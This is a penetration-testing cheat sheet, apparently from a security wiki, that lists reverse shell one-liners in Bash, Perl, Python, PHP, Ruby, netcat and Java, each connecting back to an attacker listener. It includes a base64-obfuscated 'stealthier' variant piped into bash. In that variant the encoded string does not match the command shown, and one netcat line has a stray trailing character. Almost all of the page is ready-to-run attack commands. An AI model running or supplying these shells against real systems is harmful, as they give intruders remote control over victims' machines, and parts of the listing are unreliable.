# Alternate Reverse Shells

Many a times reverse shells using netcat may not be possible as the tool by itself will not be installed on that system. Under such circumstances it is better to use other scripting languages or tools to initiate the reverse shell. Here are some of the reverse shell commands using various technologies,

{% hint style="info" %}
Netcat should be started on your system before any of the following commands are executed. For these examples we will assume netcat to be listening on IP 192.168.1.10 and port 80 
{% endhint %}

<details>

<summary>Bash</summary>

```
bash -i >& /dev/tcp/192.168.1.10/80 0>&1
```

</details>

<details>

<summary>Stealthier Method</summary>

\#Base64 encode command using,

echo "bash -c 'bash -i >& /dev/tcp/192.168.45.2/443 0>&1'" | base64 -w0

\#Use the output in the victim machine with base64 decode command,

echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

</details>

<details>

<summary>Perl</summary>

```
perl -e 'use Socket;$i="192.168.1.10";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

</details>

<details>

<summary>Python</summary>

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

</details>

<details>

<summary>PHP</summary>

```
php -r '$sock=fsockopen("192.168.1.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

</details>

<details>

<summary>Ruby</summary>

```
ruby -rsocket -e'f=TCPSocket.open("192.168.1.10",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

</details>

<details>

<summary>Netcat</summary>

I am including netcat as well for easy reference,

```shell
nc -e /bin/sh 192.168.1.194 80e
```

If the client has the wrong version of netcat, then the following command may come in handy as pointed out by Jeff Price,

<pre><code><strong>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&#x26;1|nc 192.168.1.10 80 >/tmp/f
</strong></code></pre>

</details>

<details>

<summary>Java</summary>

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

</details>

## Other Resources

<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python>